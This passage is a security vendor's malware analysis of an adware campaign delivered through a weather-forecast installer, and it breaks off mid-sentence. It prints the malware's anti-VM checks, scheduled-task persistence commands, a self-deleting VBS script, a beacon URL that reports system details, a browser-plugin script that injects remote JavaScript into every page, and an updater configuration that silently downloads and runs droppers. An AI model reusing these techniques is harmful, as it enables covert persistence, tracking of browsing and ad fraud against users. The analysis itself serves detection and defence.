weather forecast for today? advert flood coming from east

Weather Forecast for Today? Advert Flood Coming from East

Case study of an advert injector installed via a weather forecast application

Jakub Křoustek

AVG Technologies, Virus Lab

October 2015

2

© 2015 AVG Technologies. All Rights Reserved. 2

Contents

1 Introduction .................................................................................................................................. 3

2 Spreading .................................................................................................................................... 4

3 Malware Deployment ................................................................................................................... 5

3.1 Dropper ................................................................................................................................ 6

3.2 Malware Installer (LiteC.exe) ................................................................................................ 7

4 Injection in Browsers .................................................................................................................. 13

4.1 Internet Explorer ................................................................................................................. 13

4.2 Firefox ................................................................................................................................ 13

4.3 Chrome............................................................................................................................... 15

4.4 Behavior of Infected Browsers ............................................................................................ 16

5 Hidden Adverts .......................................................................................................................... 22

6 Updater ...................................................................................................................................... 24

7 Digging for Information .............................................................................................................. 26

8 Conclusion and Indicators of Compromise ................................................................................. 31

IOC (Indicators of Compromise) .................................................................................................... 31

Appendix A – SHA256 Check-sums of Analyzed Samples ............................................................... 32

3


1 Introduction

Despite blocking efforts, online advertising is a daily part of our lives. Most of us get used to a volume

of daily displayed adverts, but authors of malicious code try to push our limits much further via

adverts-injection techniques used in the nowadays malware threats. As Google and other institutions

pointed out in a recent research: “We found that ad injection has entrenched itself as a crossbrowser

monetization platform impacting more than 5% of unique daily IP addresses accessing Google – tens

of millions of users around the globe.”1.

In this post, we present a case study of one such malware that we detected via our AVG Identity

Protection (IDP) component. The user infection starts while installing an application proclaimed by its

authors as a "Weather Forecast Application". However, once installed, this application downloads

and installs other components that are purely malicious as we present in the following technical

analysis.

Figure 1 – WeatherApp – the infection vector.

Among other things, this threat tries to infect all the installed browsers and inject additional adverts in

the visited pages. Furthermore, it periodically loads another bunch of adverts on a background

without a user notification. As a side-effect, it sacrifices security and performance of the infected

systems. All of that is done for gaining profit paid by advert providers.

At the end of this study, we present several details about background of this infection and its authors.

1 Quoted from http://research.google.com/pubs/pub43346.html

http://research.google.com/pubs/pub43346.html

4


2 Spreading

Based on our telemetry, this infection is highly active in these days and it is reaching its maximal

peak.

Figure 2 – Total number of detected samples.

The most affected countries are United States and Germany, followed by Saudi Arabia and United

Arab Emirates.

Figure 3 – Countries most affected by spreading of this infection (Jun-Sep 2015).

0

1000

2000

3000

4000

5000

6000

7000

1.6.2015 15.6.2015 29.6.2015 13.7.2015 27.7.2015 10.8.2015 24.8.2015

Total Linear (Total)

5


3 Malware Deployment

Delivery of similar threats is usually done via drive-by-download (e.g. the user visits a particular

website or receives a download link in a spam email) or it is installed on the computer through

another program.

In this case, the delivery of the malware toolchain is done by via a seemingly harmless weather-

forecast application available from web page http://www.jasonschober.net/. The application

itself is hosted on the Amazon Web Services (AWS) cloud.

Figure 4 – Homepage of the WeatherApp (i.e. the input vector).

The downloaded Nullsoft Install System (NSIS) installer WeatherAppSetup.exe deploys a very

simple weather forecast application, which only displays the following webpage within the application

window: http://www.deltaweather.com/weatherApp.php?location=London,UK.

Figure 5 – The first installer.

6


Figure 6 – “Dummy” application for weather forecast (serving first adverts).

Moreover, the installer silently extracts the second application GUP.exe, which is the entry point of

infection – it periodically downloads and installs the latest versions of the malicious toolchain

described in the next part2.

Furthermore, the weather application supports an uninstallation process. However, this does not

apply to the second application, which stays untouched by the uninstaller. This is clearly the intended

behavior.

3.1 Dropper

The malicious toolchain exists in many different versions that are distributed with different filenames,

program icons, used packers, etc. For our analysis, we selected the executable file named 5.exe

that we first detected in August 2015. Furthermore, we also mention the differences with the latest

version (rinm.exe, September 2015) via the "UPDATE" tag in the text.

File 5.exe is a dropper also created by using NSIS. Furthermore, the NSIS SelfDel.dll plugin has

been used for deleting the dropper immediately after its task is complete.

2 The WeatherApp installer also dumps and executes application sysinfo.exe, which acts similarly

to the LiteC.exe dropper described later in the text (e.g. reporting to a remote site).

7


Figure 7 – NSIS installer of the malicious toolchain.

Before deleting itself, the dropper extracts and executes another file from the following location:

C:\Users\{UserName}\AppData\Roaming\LiteC.exe.

3.2 Malware Installer (LiteC.exe)

LiteC.exe is yet another dropper, which acts similarly to an installer – it deploys applications and

libraries, registers them to run automatically, etc.

Figure 8 – Visualization of the installed malware components.

UPDATE: The latest version uses only one installer, i.e. the LiteC.exe part is no longer used – it

integrates both parts into a single part.

This file LiteC.exe is digitally signed and issued for Irina Mihaylovna ([email protected],

Sofia, Bulgaria).

8


Figure 9 – Digital signature (2015).

The previous versions were also signed, but for Irina Polyanskaya (again Sofia, Bulgaria). We will

refer to this information at the end of this study.

Figure 10 – Digital signature (2014).

First of all, LiteC checks whether it is running in a virtualized or emulated environment.

9


3.2.1 VM Checks

The VM checking is done via a quite rich set of conditions, such as:

Detecting presence of a running debugger: IsDebuggerPresnt(), GetTickCount(),

CheckRemoteDebuggerPresent(), etc.;

Detecting VMware and VirtualBox in BIOS:

o serial number: "wmic.exe /output:"sn.txt" bios get serialnumber"

o "HKLM\HARDWARE\Description\System\VideoBiosVersion"

o "HKLM\HARDWARE\Description\System\SystemBiosVersion"

Checking username of the current user: "SANDBOX" and "VIRUS";

Checking process name containing strings such as "SAMPLE", "VIRUS", or "SANDBOX";

Detecting Sandboxie via a loaded library sbiedll.dll;

Detecting Wine via a presence of function wine_get_unix_file_name() within the

kernel32.dll library;

Checking identifiers vmware and vbox in registry keys:

o "HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id

0\Logical Unit Id 0\Identifier"

o "HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id

0\Logical Unit Id 0\Identifier"

Detecting installed VirtualBox and VMWare guest additions and/or drivers:

o "HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions"

o "HKLM\SOFTWARE\VMware, Inc.\VMware Tools"

o GetFileAttributesW(L"C:\\WINDOWS\\system32\\drivers\\VBoxMouse.sys");

o GetFileAttributesW(L"C:\\WINDOWS\\system32\\drivers\\vmmouse.sys"); o GetFileAttributesW(L"C:\\WINDOWS\\system32\\drivers\\vmhgfs.sys");

However, some of these checks are not properly implemented and they fail to detect the VM.

3.2.2 Malware Extraction

After the initial checks, LiteC.exe creates a temporary directory where it extracts two files from its

resources: Unrar.exe and Ob.dat, e.g. C:\Users\{UserName}\AppData\Local\{D1C06B0A-5E74-

4F7A-B607-76DE1A806B98}.

Figure 11 – Two files hidden in resources of LiteC.exe.

10


Unrar.exe is a freeware utility bundled to this malware, which is used for extraction of RAR file

Ob.dat.

Figure 12 – UNRAR utility used for extraction of the malware.

However, the RAR archive is password protected and the key is stored enciphered within LiteC.exe

(deciphered key for this particular dropper is "lblduXWYn").

The archive itself contains the following files that are extracted into the target folders one by one via

similar function calls:

ShellExecute(NULL, "runas",

"C:\\Users\\{UserName}\\AppData\\Local\\{random}\\Unrar.exe",

"x \"C:\\Users\\{UserName}\\AppData\\Local\\{Random}\\Ob.dat\" "

"\"gup.xml\" \"C:\\Users\\{UserName}\\AppData\\Roaming\\PlusN\" "

"–p\"lblduXWYn\" -y ", /*...*/);

Updater: GUP.exe and gup.xml into "C:\Users\{UserName}\AppData\Roaming\PlusN\" (other

used directory names are "NewNotepad", "charts", "Bonzo", "Cucckoo", "benko", etc.).

Both files are also copied to "C:\ProgramData\Convertor\" as Convertor.exe and gup.xml;

IE plugins: Files PdfConv_32.dll and PdfConv_64.dll are extracted into directory

"C:\Users\{UserName}\AppData\Roaming\pdfie\";

UPDATE: The files were renamed to Nets_32.dll and Nets_64.dll and moved into a different

directory: "C:\Users\{UserName}\AppData\Roaming\nets\";

Firefox add-on: Folder "firefox" containing multiple files (install.rdf, chrome.manifest, etc.)

into Firefox installation directory (if found), e.g. "C:\Program Files (x86)\Mozilla

Firefox\distribution\bundles\";

UPDATE: To have no doubts about the authorship of this malicious add-on, the authors renamed

it from "firefox" to "[email protected]" in the latest version.

Installer of Chrome extension: The executable file rinti.exe is extracted into directory

"C:\Users\{UserName}\AppData\Roaming\{random string, e.g. JyyvL52l}\";

Downloader of a PhantomJS-based adverts background downloader: de10.exe into directory

"C:\Users\{UserName}\AppData\Roaming\ornaldo\".

UPDATE: This component is not installed by the latest version at the moment.

11


Afterwards, it checks the presence of CURL3 libraries within the system directory. Those libraries are

actually necessary for running applications GUP.exe and Convertor.exe. In case of their absence,

LiteC downloads these libraries from the official web4 via the Urlmon function

URLDownloadToFileW(). After the download, the zip archive is extracted into the system directory,

e.g. "{Windows}\system32".

UPDATE: CURL libraries are now directly included into the initial installer WeatherAppSetup.exe.

3.2.3 Creating Tasks

After that, LiteC registers the newly created executables to start automatically. This functionality is

usually done via Windows Registry (e.g. the Run and RunOnce keys), but not in this case. LiteC uses

Windows Task Scheduler for automatic and periodical execution of these files.

Figure 13 – Scheduling malicious tasks.

Some of these tasks are run periodically (e.g. downloading adverts on background), some only while

the computer is idle (e.g. automatic update), and the remaining tasks are executed right after user

login (e.g. infection of Chrome).

The tasks are created via the following commands:

schtasks.exe /Create /TR "C:\Users\{UserName}\AppData\Roaming\{random}\rinti.exe"

/SC ONLOGON /TN "DriverMgr" /RL H

LiteC also takes care about any previously installed versions by deleting the existing tasks:

schtasks.exe /Delete /tn "DriverMgr" /f

3.2.4 Calling Home

After the successful installation of its components, LiteC “calls home” with details about the infected

system. It contacts domain http://www.affiliatesys.info, e.g.:

http://www.affiliatesys.info/AF/sucess/thanks.php?rnd=1366912762&affid=1010&affsou

rce=1010&av=None&win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build+2600)

&RAM=1.00+GB&Processor=Intel(R)+Xeon(R)+CPU+E5-2620+0+@+2.00GHz&Cores=1&v=1&re=161

&uid=HOME-xxxx-xxxx-xxxx-xxxx-xxx&hds=65344646&prx=0&mac=xx:xx:xx:xx:xx:xx&net=3.5

In other words, it sends information about the installed OS, CPU and RAM details, MAC address,

version of LiteC, installed .NET version, installed Antivirus software, ID of the campaign, etc.

UPDATE: As we found out by using our Retargetable Decompiler5, the authors started using a public

implementation6 of the AES algorithm for enciphering these messages (it uses the CBC mode7, the

3 http://curl.haxx.se/ 4 http://curl.haxx.se/gknw.net/7.40.0/dist-w32/curl-7.40.0-devel-mingw32.zip 5 https://retdec.com/

http://curl.haxx.se/

http://curl.haxx.se/gknw.net/7.40.0/dist-w32/curl-7.40.0-devel-mingw32.zip

https://retdec.com/

12


empty initialization vector and a hardcoded hexadecimal key

"159DEAD951FD29701F0C5D751522FBF51A8C66FD46E79539C53B64F659DDAA26"), e.g.:

http://www.affsystem.info/aff/thanks/thanks3.php?code=7F39ACC132838C4141F3C1507E6D

426D8CEC5F1865D57DB2249C52C67F14A85ACF56F5AD9765BFD59301F213418E4DC65CF9620931F80F

564667317F85A3D72391BD359C560490B8E254943A514DC21B0E186E4DC304FFDC2973C9D3E4EF8...

3.2.5 Clean-up

At the end, LiteC.exe deletes itself by using the newly created VBS script

C:\Users\{UserName}\AppData\Local\{random}.vbs (it also wipes itself to cover tracks):

WScript.Sleep 1500

Dim fso

Set fso = CreateObject("Scripting.FileSystemObject")

fso.DeleteFile("C:\Users\{UserName}\AppData\Roaming\LiteC.exe")

fso.DeleteFile(Wscript.ScriptFullName)

Figure 14 – VBS clean-up script.

6 http://www.codeproject.com/Articles/1380/A-C-Implementation-of-the-Rijndael-Encryption-Decr 7 https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher_Block_Chaining_.28CBC.29

http://www.codeproject.com/Articles/1380/A-C-Implementation-of-the-Rijndael-Encryption-Decr

https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher_Block_Chaining_.28CBC.29

13


4 Injection in Browsers

The main purpose of this malware is to display adverts and thus gaining profit to its authors

(i.e. “monetization” by terms of authors). To achieve this task, all the major browsers are infected by

malicious add-ons.

4.1 Internet Explorer

The integration in Internet Explorer is done via the so-called "Browser Helper Objects"8. Those are

DLL modules designed by Microsoft to work as browser plugins that are loaded during browser’s

startup. The malware authors prepared two such “plugins” (32-bit and 64-bit), located in:

C:\Users\{UserName}\AppData\Roaming\pdfie\PdfConv_32.dll and PdfConv_64.dll.

UPDATE: Nets_32.dll and Nets_64.dll

Both DLLs are registered via another VBS script:

Set objShell = WScript.CreateObject("WScript.Shell")

objShell.Run "Regsvr32 /s " & chr(34) & ' i.e. quotation mark "

"C:\Users\{UserName}\AppData\Roaming\pdfie\PdfConv_32.dll" & chr(34)

objShell.Run "Regsvr32 /s " & chr(34) &

"C:\Users\{UserName \AppData\Roaming\pdfie\PdfConv_64.dll" & chr(34)

Figure 15 – Registering IE plugins via VBS.

Furthermore, both of them are signed by the aforementioned digital certificate for Irina Mihaylovna

and they are internally identified as "Vonteera Safe ads" by AdTech.

UPDATE: The plugins are no longer digitally signed, but their behavior remains the same.

4.2 Firefox

As we already mentioned, infection of Firefox is done via installation of an add-on into "{Firefox

installation directory}\distribution\bundles\". Mozilla has provided this directory as a

standard mechanism for enterprises to deploy extensions. However, it has been largely abused by

malware authors (like in this case) and Mozilla discontinued this feature in version 40 (see the

developers discussion9). Therefore, this malware add-on is not working in Firefox version 40+.

In the previous Firefox versions, add-ons installed via the distribution\bundles folder were not listed in

the extensions list and thus the user cannot simply remove them:

8 https://en.wikipedia.org/wiki/Browser_Helper_Object 9 https://bugzilla.mozilla.org/show_bug.cgi?id=1144127

https://en.wikipedia.org/wiki/Browser_Helper_Object

https://bugzilla.mozilla.org/show_bug.cgi?id=1144127

14


Figure 16 – The malicious add-on is not listed in Firefox.

However, presence of the AdTech add-on can be still checked via the about:config page:

Figure 17 – Firefox about:config page containing Adtech references.

According to the installed file install.rdf, the add-on refers to itself as "Super Web Accelerator ! by

AdTech".

Figure 18 – The install.rdf file used in Firefox add-on.

15


4.3 Chrome

Infection of Chrome is (again) quite tricky. It is done via the aforementioned application rinti.exe,

which at first instructs Chrome to install an official extension "Google Quick Scroll"10 (its ID in Chrome

web store is "okanipcmceoeemlbjnmnbdibhgpbllgc").

The installation is done via the Chrome technique called “Force-install”11, which is provided by

Google to enterprises for installing predefined extensions. However, like in Firefox, this feature is

being misused by malware authors.

As a result, rinti.exe creates the following registry key and Chrome downloads and installs such

extension right after its start.

Figure 19 – Forcing Chrome to install an extension.

Unlike in Firefox, the extension is listed in Chrome. However, it cannot be uninstalled because of the

used force-install policy.

Figure 20 – Forcefully installed Chrome extension.

10 https://chrome.google.com/webstore/detail/google-quick-scroll/okanipcmceoeemlbjnmnbdibhgpbllgc?hl=en 11 https://dev.chromium.org/administrators/policy-list-3#ExtensionInstallForcelist

https://chrome.google.com/webstore/detail/google-quick-scroll/okanipcmceoeemlbjnmnbdibhgpbllgc?hl=en

https://dev.chromium.org/administrators/policy-list-3#ExtensionInstallForcelist

16


Force installation of some Google extension wouldn’t be that bad. However, rinti.exe replaces the

extension’s code by its own code extracted from resources.

Figure 21 – JavaScript code hidden in resources of the rinti.exe infector.

This extracted code overwrites the original JavaScript located in file C:\Users\{UserName}\AppData\Local\Google\Chrome\User Data\Default\Extensions\okani

pcmceoeemlbjnmnbdibhgpbllgc\background_with_deps.js, which leads to a totally different

behavior.

Figure 22 – Code comparison of the original Chrome extension and the infected one.

This behavior is almost the same for all the add-ons installed in IE/Firefox/Chrome and we describe it

in detail in the following part.

UPDATE: The previously used extension has been classified as deprecated by Google and the

malware authors were forced to switch to another extension – “word highlight”12. And again, they

parasite on this extension by rewriting its JavaScript file background.js.

4.4 Behavior of Infected Browsers

All of these add-ons try to inject malicious code into all newly opened browser panels/windows. As its

authors left in a comment (main.js in Firefox add-on):

//the main js script loads everytime a new browser instance is loaded

For example the following code13 is from the IE plugin:

12 https://chrome.google.com/webstore/detail/word-highlight/ooabkmkhabkahcjbgpiajffckeibpdoa?hl=en 13 This is a de-obfuscated version of the script.

https://chrome.google.com/webstore/detail/word-highlight/ooabkmkhabkahcjbgpiajffckeibpdoa/reviews?hl=en

17


var WorkingObj = {

DocumentComplete: function(_href) {

var hrefTokens = _href["split"]("/");

if (hrefTokens["length"] < 3) {

return;

};

if ((hrefTokens[0] != "http:") && (hrefTokens[0] != "https:")) {

return;

};

WorkingObj["inject_script"](hrefTokens[0]);

},

inject_script: function(http_s) {

var _head = document["getElementsByTagName"]("head")[0];

var _script = document["createElement"]("script");

_script["type"] = "text/javascript";

if (http_s == "https:") {

_script["src"] = "https://www.adfactorytech.com/a/jstps.js";

} else {

_script["src"] = "http://www.adfactorytech.com/a/jstp.js";

};

_script["id"] = "adfactory_js";

_head["appendChild"](_script);

}

};

WorkingObj.DocumentComplete(document["location"]["href"]);

Figure 23 – De-obfuscated JavaScript code used within the IE plugin.

The purpose of this initial JavaScript is to download and execute another JavaScript from author’s

server www.adfactorytech.com. As we can see, there are two different versions of this script – one

for pages visited via HTTP (jstp.js) and the other one for HTTPS (jstps.js).

UPDATE: There are more and more domains used for hosting this adverts-serving JavaScript, e.g.

http://www.jasonadssrv.com/, http://adnetworkus.com/, http://www.advantagz.com/.

An example of one such advert, which will be injected afterwards:

Figure 24 – Example of an advert that will be injected into a visited page.

These scripts (that are based on jQuery v1.8.014) support several methods of displaying adverts

within the used browser:

14 https://jquery.com/

https://jquery.com/

18


1. Injecting adverts into visited pages along with the “original” adverts displayed by these

sites. For example, it injects multiple IFRAMEs with adverts into http://search.ask.com.

Figure 25 – Injecting adverts in visited pages.

However, the injection process is far from being flawless and the user sometimes encounters

injection of “page not found” messages instead of adverts:

Figure 26 – Adverts cannot be found.

19


2. Displaying pop-up windows, which totally cover the user’s desktop:

Figure 27 – Flood of pop-up windows15.

3. Opening a new page with adverts once the user clicks anywhere on a currently displayed

page (a hidden onclick JavaScript function is used to do that).

4. Some versions also hook all the newly created browser panels and redirect them to

predefined pages. This behavior can be for example used for a redirection to advert pages

or hijacking the user’s homepage.

// List of hardcoded pages opened in a hooked panel ['https://s3.amazonaws.com/addchh/sRCH.html'], ['https://s3.amazonaws.com/addnnch/uio4CHd.html'], ['https://s3.amazonaws.com/addns/C908/MdCHfs.html'], ['https://s3.amazonaws.com/addns/CH3088/CvCHff.html'], ['http://www.adfactorytech.com/resources/Re/Chnh/mov.php']

// which leads to a final redirect to e.g. // http://www.search.ask.com/?s=nTabCH&id=da538771-549e-4b52-9809-fbb4892bf7b9

5. Another tricky feature is a replacement of “official” adverts (i.e. those delivered by page

owners) by the injected ones, i.e. the new advert is placed on the exactly same position as

the original one.

15 Many of those weather-forecast pages displayed in this figure belong to the same guy as the original

WeatherApp. Those pages are full of adverts so their opening generates an income to their owner.

20


Figure 28 – Advert replacement feature in action (1) – the original advert.

Figure 29 – Advert replacement feature in action (2) – the replacing advert.

The particular method is chosen based on several conditions, e.g.:

Match of a visited URL, e.g. http://search.ask.com, http://badoo.com,

http://bbc.com, http://cnn.com, http://weather.com;

Match of a whitelisted site (i.e. no additional adverts will be displayed on it);

Whitelisting pages containing any of the "pornWords" in their name.

Figure 30 – Page filters used by malicious JavaScript.

Once the particular action has been chosen, the adverts-serving domain (e.g.

www.adfactorytech.com) is contacted again via the following requests:

21


var DOMAIN = 'http://www.adfactorytech.com'; var urls = { main_fnn: function () { return DOMAIN + "/b/tp/Starter.php?site="+encodedHostname+"&w="+screenWidth; }, poptp: function() { return DOMAIN + "/b/tp/servePop.php?site="+encodedHostname+"&w="+screenWidth; }, addChks: function() { return DOMAIN + "/b/tp/serveDo.php?site="+encodedHostname+"&w="+screenWidth; } }

Figure 31 – Creating requests for adverts that will be injected.

In other words, the script sends information about all the visited web pages (and other

details) to a remote server. Based on this information, the server chooses an advert to be

downloaded and displayed. This is a truly Trojan-like behavior because (1) it silently sniffs user’s

communication and (2) the downloaded content may be malicious as well (e.g. the recent

malvertisement16 campaign served via Google AdSense17). In the following figure, we can clearly see

that the details about a visited page (http://www.avg.com) are sent to a remote server.

Figure 32 – The browser add-ons are sniffing user-visited pages.

The browser add-ons also try to update themselves every day, which is an alternative to the GUP.exe

updater.

16 https://en.wikipedia.org/wiki/Malvertisement 17 http://www.securityweek.com/malvertising-campaign-abuses-google-adsense

http://www.avg.com/

https://en.wikipedia.org/wiki/Malvertisement

http://www.securityweek.com/malvertising-campaign-abuses-google-adsense

22


5 Hidden Adverts

The aforementioned methods of displaying adverts have one major drawback for its authors – they

generate profit only when the user browses the web. If not, such infected computer generates no

profit. Therefore, they figured out a way to earn money from online advertisement even if the user is

not browsing the web. They secretly download the so-called headless browser18 PhantomJS19 into

the infected PC and simulate advert impressions20 on a background without any user interaction or

notification. That is yet another Trojan-like behavior.

This feature is delivered to the infected machine via the aforementioned application de10.exe, which

downloads an 11 MB large self-extraction RAR called aofgs.exe. The extracted folder (e.g.

C:\users\{UserName}\appdata\roaming\orlando\Vipp\) consists of several applications,

configuration files, and automation scripts.

Figure 33 – Downloaded package with a head-less browser PhantomJS.

The archive contains the PhantomJS executable, which is a so-called headless browser. It is

basically a classical browser that is controlled via command-line arguments and which is easily

scriptable (i.e. automated visiting of predefined webpages, clicking links, etc.). This is a perfect setup

for someone who tries to automatically generate many advert impressions and/or clicks.

PhantomJS is configured by configuration files in the JSON format. These files are downloaded from

remote servers, such as AWS (https://s3.amazonaws.com/apsrunner/paras.json,

https://s3.amazonaws.com/apssrun/prmtrs.json).

18 https://en.wikipedia.org/wiki/Headless_browser 19 http://phantomjs.org/ 20 https://en.wikipedia.org/wiki/Impression_%28online_media%29

https://en.wikipedia.org/wiki/Headless_browser

http://phantomjs.org/

https://en.wikipedia.org/wiki/Impression_%28online_media%29

23


{

"proxy_list":[

"direct"

],

"replace_url_list" : [

"http://www.freewebseotools.com/API/H/ad.php"

],

"ua_list":[

"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)

Chrome/38.0.2125.111 Safari/537.36",

"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0",


Chrome/38.0.2125.111 Safari/537.36 OPR/25.0.1614.68",


Chrome/38.0.2125.111 Safari/537.36",

"...",

"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"

],

"url_list":[

"http://www.freewebseotools.com/seo/",

"http://www.freewebseotools.com/miscellaneous/",

"http://www.freewebseotools.com/main-website/",

"http://www.freewebseotools.com/new-tools/",

"http://www.freewebseotools.com/web-tools/"

]

}

Figure 34 – Sample file used for configuration of PhantomJS.

As we can see, it contains a list of user-agents (i.e. PhanomJS will look like Firefox or Chrome in the

eyes of adverts providers) and a link to a server (http://www.freewebseotools.com), which will

provide fresh adverts for displaying/clicking.

Finally, execution of PhantomJS is controlled by a simple .NET application mbd.exe, which is

periodically executed every 30 minutes by the Task Scheduler. Except of some trivial anti-VM

checks, mbd.exe executes PhantomJS in a background multiple times with the downloaded

configuration. Moreover, its authors try to avoid a disclosure of this shady business by advert

providers and they download only a few adverts at a time and then they take a break for few minutes.

24


6 Updater

Every several hours or every time a computer is idle, the malware-toolchain updater is executed (i.e.

GUP.exe and Convertor.exe). This is however not an original code of its authors, but it is yet

another misusage of a free code21 that originally served for automatic update of the Notepad++

editor22.

Based on the PDB debug-info location stored in GUP.exe, we can see details about their usage of

this tool “G:\PROJECTS\VolaroTech\UPDATERS_NEW_IDEAS\gup_trunk\bin\GUP.pdb”. We can also

see a reference to a string VolaroTech, which is most probably related to Volaro

Technologies & Applications23. The details will be discussed later.

The task of this updater is quite easy – it reads the location of the latest update from its configuration

file (XML), downloads the file, and executes it. Such an XML file is a 1:1 copy of the aforementioned

WinGUP project with only one tag modified: InfoUrl, e.g.:

<?xml version="1.0" ?> <GUPInput> <Version>4.6</Version> <InfoUrl>http://usads2.info/hpl88s6GT/Z4.php</InfoUrl> <ClassName2Close></ClassName2Close> <MessageBoxTitle extraCmd="" ecWparam="" ecLparam="">Notepad++ update </MessageBoxTitle> <SilentMode>yes</SilentMode> </GUPInput>

Figure 35 – Updater XML configuration file24.

Few examples of the other update sites are:

http://usttor.info/hV93AwPtr1u/B6.php

http://usdsd1.info/gCd7QYch/jzuFZ.php

http://usads2.info/zPj6FII6u6/jj.php

http://weath4us.info/mC81EyWEc/vb.php

http://weathus1.info/JCWNQ/GX1AA.php

http://weathtoous.info/fhcm5tie8u3w/bzugC.php

Such update site (probably running on a GUP server-side25) contains information about availability of

a new dropper. If the version is newer than the current installation, the file is downloaded and

executed.

21 https://github.com/gup4win/wingup 22 http://docs.notepad-plus-plus.org/index.php/Auto_Updates 23 http://www.volarotech.com/ 24 The comments have been removed for a better readability. 25 http://sourceforge.net/projects/gup/

https://github.com/gup4win/wingup

http://docs.notepad-plus-plus.org/index.php/Auto_Updates

http://www.volarotech.com/

http://sourceforge.net/projects/gup/

25


Figure 36 – Server-side information about the available updates.

During the update, all the previously installed applications, configurations, and add-ons are

overwritten by the new droppers (e.g. 5.exe, LiteC.exe).

At the time of writing, there exist multiple versions of the initial droppers (i.e. 5.exe). Except of the

aforementioned NSIS installer, the other samples are also packed by different tools such as UPX or

MPRESS. The authors also used different icons and names for the other versions to make them

more unique.

Figure 37 – Different versions of the initial dropper.

However, the content of these droppers is practically the same (except of different update sites in

configuration files, passwords for RAR archives, compilation timestamps, etc.).

26


7 Digging for Information

While digging some information about the authors of this malware, we found out few pieces that can

give us an overview about background of the malware. Here are some facts we found.

(1) The infection starts by downloading the WeatherApp from the aforementioned web page

http://www.jasonschober.net/ registered by Jason Schober (Bucharest, Romania).

Figure 38 – WHOIS information for domain jasonschober.net.

According to available information, Jason Schober is a CTO of Jason Schober Media Inc., who

described himself as a “Desktop/Mobile monetization expert with over 8 years of hands-on

experience”. Whether infection of users with malicious code can be classified as monetization is left

for the reader to decide.

(2) The WeatherApp installer deploys the aforementioned GUP updater containing a reference to the

Volaro Technologies & Applications with homepage http://volarotech.com/ (contact information:

Sofia, Bulgaria).

Figure 39 – Homepage of “Volaro”.

27


This domain has been registered by someone called Sami Yosef ([email protected] and

[email protected], Sofia, Bulgaria), who also registered more than 100 other domains:

Figure 40 – Shortened list of domains registered by Sami Yosef. The highlighted domains are related to this adverts-injection campaign.26

In this list, we can see many sites that has been used in this malicious campaign for spreading the

malware executables (e.g. GUP update sites http://usds1.info, http://usttor.info,

26 Some of the other domains are also quite suspicious, such as http://simply-google.com or

http://gefreefirefox.info.

Registered Domains

1069fm.org arabiamoney.com golgool.info sofoolo.info

acads1.info arabvid.info holiday-rent.net style-fx.com

acadspop.info arabycelebs.com hp4games.info upfilez.info

acdcads.com arabyvideos.com hpmyhom.info usads2.info

adcollap.info asby-inv.info hpworld.info usatoolbox.info

adconl.info atmidfield.com mntor.info usdd1.info

adkkllaps.info azlyricz.com mooca.us usdoloo.info

adnet100.info celebsmena.com mycloudfiles.info usdoor.info

adnets.info celebsstory.com mydnews.us usds1.info

adnetwork100.info climonomics.com myfilezcloud.info usdsd1.info

adscee.info colompia.info myintermool.info usfound.info

adscpddr.info colrado.info myphotox.info uspassback.info

adscpopr.info deportal.info myportal4.us uss1.info

adscseed.info dfogol.info nansq.info ussool.info

adsice.info dolfine.info novoadsmedia.com ustolla.info

adskdoom.info fashionksa.com o-match.com usttor.info

adskoola.info flashgames4fee.info picsaty.com usus2.info

adsq2.info foolapo.info playflashgames900.com volarotech.com

adsscddws.info freearabsofts.com realadblock.com weath23.info

affsystem.info freecloudfiles.info realblocker.com weath4us.info

alarabeyes.com freewebseotools.com searchfreeweb.us weathallus.info

amzcoolar.info ftbuss.info servad.info weathme1000.info

amzworlde.info ftus.info sese1200.info weathtoous.info

arabia-biz.com gbpforecast.com setevet.info weathus.info

arabia-business.net gefreefirefox.info sigma-delta.info weathus1.info

arabia-cars.com getfreeccleaner.info simply-google.com weathus88.info

arabiaeve.com getmybrowser.info sisi12.info wfsp.info

28


http://usads2.info) as well as for serving the adverts (http://freewebseotools.com/, which is

used for obtaining the adverts for the PhantomJS browser).

UPDATE: Furthermore, the same person registered the domain http://affsystem.info, which is

used for notifying the authors about newly infected systems.

(3) The certificates used for signing of droppers and browser infectors contain two female names –

Irina Mihaylovna and Irina Polyanskaya (again Sofia, Bulgaria). The email address used in one of the

certificates refers to domain http://ads-blocker.net/27.

Figure 41 – Homepage of “Ads Blocker”.

This page is an exact copy of the aforementioned VolaroTech homepage (only the name has been

changed) and both pages are also translated to the same IP address28, which illustrates

interconnection of all of these components. Furthermore, both WHOIS information and contact

information refer to the same location (Sofia) and person (Irina Mihaylovna).

(4) Furthermore, the site http://www.affiliatesys.info contacted by the LiteC dropper for

reporting the newly infected victims has been registered by someone called George Cristy (Riga,

Latvia) with registration email address [email protected].

The same email address has been used for registering domain http://www.adfactorytech.com/,

which is the main source of adverts and also a destination of sniffed web pages visited by users.

However, the registrant name differs – it is once again Irina Polyanskaya.

27 It is probably an attempt to make a joke by naming something that constantly displays adverts as an “Ads Blocker”. 28 https://www.virustotal.com/cs/ip-address/178.63.60.80/information/

https://www.virustotal.com/cs/ip-address/178.63.60.80/information/

29


(5) UPDATE: Instead of http://www.adfactorytech.com/, the adverts are now delivered by using

the site http://www.jasonadssrv.com/, which belongs to Jason Schober as well as several

weather-forecast pages, such as http://www.deltaweather.com/, that are heavily visited in the

pop-up windows on the infected systems.

To be correct, neither the content of digital certificates nor the WHOIS records can be considered as

a fully trustworthy source of information because it is easy to fake them. However, all of these pieces

give us an overview about the group behind this malware campaign. Unlike in the other malware

samples, which use outsourced systems of third parties (e.g. delivery via exploit kits, executables

stored on hacked WordPress pages, outsourced malware modules), this malware seems to be

created and operated fully by one group (perhaps based in East Europe) because:

The delivery is done by using the authors’ software hosted on their own webpage.

Updates of the malware toolchain are obtained from their web pages as well.

Strings unwillingly left in the malware binaries prove the interconnection with those webs,

companies, and their owners.

Injected adverts are delivered via web pages belonging to the same owners.

The last unanswered question is, how do they earn money? We also tried to figure this out, i.e. who

is paying for the displayed adverts.

After several redirects from the authors’ page http://www.freewebseotools.com in

